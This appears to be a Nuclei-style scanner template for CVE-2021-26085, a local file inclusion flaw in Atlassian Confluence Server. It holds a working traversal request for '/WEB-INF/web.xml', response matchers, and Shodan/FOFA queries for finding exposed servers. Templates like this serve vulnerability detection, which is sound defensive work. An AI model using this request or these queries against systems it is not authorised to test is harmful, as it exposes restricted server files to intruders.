53 lines
2.0 KiB
YAML
53 lines
2.0 KiB
YAML
id: CVE-2021-26085
|
|
|
|
info:
|
|
name: Atlassian Confluence Server - Local File Inclusion
|
|
author: princechaddha
|
|
severity: medium
|
|
description: Atlassian Confluence Server allows remote attackers to view restricted resources via local file inclusion in the /s/ endpoint.
|
|
impact: |
|
|
An attacker can access sensitive information stored on the server, potentially leading to unauthorized access or data leakage.
|
|
remediation: |
|
|
Apply the latest security patches provided by Atlassian to fix the vulnerability.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html
|
|
- https://jira.atlassian.com/browse/CONFSERVER-67893
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-26085
|
|
- http://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html
|
|
- https://github.com/e-hakson/OSCP
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2021-26085
|
|
cwe-id: CWE-425
|
|
epss-score: 0.95896
|
|
epss-percentile: 0.9945
|
|
cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: atlassian
|
|
product: confluence_data_center
|
|
shodan-query:
|
|
- http.component:"Atlassian Confluence"
|
|
- http.component:"atlassian confluence"
|
|
fofa-query: app="atlassian-confluence"
|
|
tags: cve2021,cve,kev,packetstorm,confluence,atlassian,lfi,intrusive
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- <display-name>Confluence</display-name>
|
|
- com.atlassian.confluence.setup.ConfluenceAppConfig
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022025d9a106d54fbeb8e190d79ef6a8a7b0115628c0cf1359c46f6f7cf4785916ce022100ec4ec72a54802ea7d87deee4f897c58227858e81ab0f8bb8e217104484b2b935:922c64590222798bb761d5b6d8e72950 |